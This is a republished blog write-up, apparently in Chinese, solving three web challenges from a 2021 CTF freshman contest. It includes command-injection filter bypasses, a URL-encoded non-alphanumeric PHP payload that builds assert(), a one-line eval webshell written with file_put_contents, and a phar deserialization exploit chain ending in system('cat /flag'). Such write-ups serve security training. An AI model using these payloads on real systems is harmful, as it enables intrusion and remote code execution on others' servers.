欢迎来到尧图网

客户服务 关于我们

您的位置:首页 > 教育 > 锐评 > NSSCTF-2021年SWPU联合新生赛

NSSCTF-2021年SWPU联合新生赛

2024/11/30 10:44:57 来源:https://blog.csdn.net/2302_78903258/article/details/140629793  浏览:    关键词:NSSCTF-2021年SWPU联合新生赛

[SWPUCTF 2021 新生赛]finalrce

这道题目考察tee命令转义符\

这题主要是,遇到一种新的符号,"\"—转义符。我理解的作用就是在一些控制字符被过滤的时候,可以用转义符,让控制符失去原本的含义,变为字面量,但是作用不变。

目录扫描得到1.txt文件,但是发现里面没有内容,利用tee命令可以输出文件内容

url=l\s /|tee 1.txt;

 因为没有回显,所以需要把查看出来的内容读取并且写入一个地方来查看,tee命令就是从标准输入读取,再写入标准输出和文件。简单说就是把查看的内容读取然后写入到后面的1.txt文件

http://node4.anna.nssctf.cn:28410/1.txt

 

发现类似flag文件,但是直接访问的话没有内容,依旧是用tee命令输出内容,这里过滤la字符,所以我们要用转义符\绕过

?url=tac%20/flllll\aaaaaaggggggg|tee%202.txt

之后我们再进行访问即可

http://node4.anna.nssctf.cn:28410/2.txt

 

[SWPUCTF 2021 新生赛]hardrce_3

考察点:自增绕过

 打开题目,看到题目过滤了异或和取反,并且数字、字母也进行了过滤,尝试用自增进行绕过

//测试发现7.0.12以上版本不可使用
//使用时需要url编码下
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
固定格式 构造出来的 assert($_POST[_]);
//转换成url编码
%24_%3d%5b%5d%3b%24_%3d%40%22%24_%22%3b%24_%3d%24_%5b'!'%3d%3d'%40'%5d%3b%24___%3d%24_%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24___.%3d%24__%3b%24____%3d'_'%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24__%3d%24_%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24__%2b%2b%3b%24____.%3d%24__%3b%24_%3d%24%24____%3b%24___(%24_%5b_%5d)%3b
然后post传入   _=phpinfo();

这里简单解释一下:

  1. $_=[];$_=@"$_";``$_值为Array,大概因为数组与字符串之间拼接(笔者这么认为),而'!'=='@'值为false也就是0即$_A
  2. 后面是一些字符的递增运算和字符的拼接

尝试执行发现大部分命令执行指令(diable_function)都过滤了,同时设置了open_basedir,无法看到文件

这里发现file_put_contents没过滤,写入

_=file_put_contents('1.php','<?php eval($_POST['aa']);?>');

 最后访问1.php文件,得到flag

[SWPUCTF 2021 新生赛]babyunser 

本题目考察phar的反序列化

phar文件本质上是一种压缩文件,会以序列化的形式存储用户自定义的meta-data。当受影响的文件操作函数调用phar文件时,会自动反序列化meta-data内的内容。(漏洞利用点)

php通过用户定义和内置的“流包装器”实现复杂的文件处理功能。内置包装器可用于文件系统函数,如(fopen(),copy(),file_exists()和filesize()。 phar://就是一种内置的流包装器

常见的流包装器

file:// — 访问本地文件系统,在用文件系统函数时默认就使用该包装器
http:// — 访问 HTTP(s) 网址
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流(I/O streams)
zlib:// — 压缩流
data:// — 数据(RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP 归档
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — 音频流
expect:// — 处理交互式的流

phar文件必要的结构组成

stub:phar文件的标志,必须以 xxx __HALT_COMPILER();?> 结尾,否则无法识别。xxx可以为自定义内容。manifest:phar文件本质上是一种压缩文件,其中每个被压缩文件的权限、属性等信息都放在这部分。这部分还会以序列化的形式存储用户自定义的meta-data,这是漏洞利用最核心的地方。content:被压缩文件的内容signature (可空):签名,放在末尾。

漏洞利用条件

phar可以上传到服务器端(存在文件上传)要有可用的魔术方法作为“跳板”。文件操作函数的参数可控,且:、/、phar等特殊字符没有被过滤

phar生成

<?phpclass TestObject {}$phar = new Phar("phar.phar"); //后缀名必须为phar$phar->startBuffering();$phar->setStub('GIF89a'."<?php __HALT_COMPILER(); ?>"); //设置stub$o = new TestObject();$o -> data='hu3sky';$phar->setMetadata($o); //将自定义的meta-data存入manifest$phar->addFromString("test.txt", "test"); //添加要压缩的文件//签名自动计算$phar->stopBuffering();
?>

绕过方式

当环境限制了phar不能出现在前面的字符里。可以使用compress.bzip2://compress.zlib://等绕过

compress.bzip://phar:///test.phar/test.txt
compress.bzip2://phar:///test.phar/test.txt
compress.zlib://phar:///home/sx/test.phar/test.txt

也可以利用其它协议

php://filter/read=convert.base64-encode/resource=phar://phar.phar

GIF格式验证可以通过在文件头部添加GIF89a绕过

1$phar->setStub(“GIF89a”."<?php __HALT_COMPILER(); ?>"); //设置stub
2、生成一个phar.phar,修改后缀名为phar.gif

首先,看到一个文件上传功能,上传一个文件自动转换为txt文件,不考虑文件上传的漏洞。

另外一个功能叫查看文件,我们把上传的文件查看一下,发现自己上传以及不存在的文件会提示404
而其他通过输入index.php查看文件有read.php、upload.php就可以直接获取源码
通过这一功能获得的源码,其中read.php中包含着class.php

 class.php

<?php
class aa{public $name;public function __construct(){$this->name='aa';}public function __destruct(){$this->name=strtolower($this->name);}
}class ff{private $content;public $func;public function __construct(){$this->content="\<?php @eval(\$_POST[1]);?>";}public function __get($key){$this->$key->{$this->func}($_POST['cmd']);}
}class zz{public $filename;public $content='surprise';public function __construct($filename){$this->filename=$filename;}public function filter(){if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){die('这不合理');}}public function write($var){$filename=$this->filename;$lt=$this->filename->$var;//此功能废弃,不想写了}public function getFile(){$this->filter();$contents=file_get_contents($this->filename);if(!empty($contents)){return $contents;}else{die("404 not found");}}public function __toString(){$this->{$_POST['method']}($_POST['var']);return $this->content;}
}class xx{public $name;public $arg;public function __construct(){$this->name='eval';$this->arg='phpinfo();';}public function __call($name,$arg){$name($arg[0]);}
}

read.php

<?php
error_reporting(0);
$filename=$_POST['file'];
if(!isset($filename)){die();
}
$file=new zz($filename);
$contents=$file->getFile();
?>

这里有文件上传,文件读取,还有链子,还禁用一些伪协议,就是没有禁用phar,提示已经十分明显了,虽然upload这里会进行重命名,phar是看文件内容的,改名字是没有关系的。

从read.php就可以知道是从aa类进入的,这里我们分析分析,可以不可以搞出来一个链子.

首先,在read.php代码里实现了zz类的实例化,然后调用了getFile方法。这个方法调用了filter的过滤器。

 

然后就是file_get_contents函数

我们利用phar反序列化写入我们希望的数据

我们可以在代码里看到

key所代表的对象中的方法,方法名为this->func。因为我们知道system作为危险函数
是可以命令执行的。

所以,链子往这个方向走。

key就是content的值,因为__get()在一个类的不可访问或者不存在的成员变量时调用。所以,

就需要触发ff方法的私有参数content 触发后就能返回content的值到key.

看到write方法

exp: 

<?php
class aa{public $name;function __construct(){$this->name = new zz();}
}class ff{private $content;public $func = "assert";function __construct(){$this->content = new xx();}
}class zz{public $filename;public $content='surprise';function __construct(){$this->filename = new ff();}}class xx{public $name;public $arg;
}$a = new aa();
echo urlencode(serialize($a));# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算
$phar->stopBuffering();

生成phar文件后上传


然后在read.php利用

POST:

file=phar://upload/c455472718d4a76381c323c21e35e574.txt&method=write&var=content&cmd=system('cat /flag');

 

版权声明:

本网仅为发布的内容提供存储空间,不对发表、转载的内容提供任何形式的保证。凡本网注明“来源:XXX网络”的作品,均转载自其它媒体,著作权归作者所有,商业转载请联系作者获得授权,非商业转载请注明出处。

我们尊重并感谢每一位作者,均已注明文章来源和作者。如因作品内容、版权或其它问题,请及时与我们联系,联系邮箱:809451989@qq.com,投稿邮箱:809451989@qq.com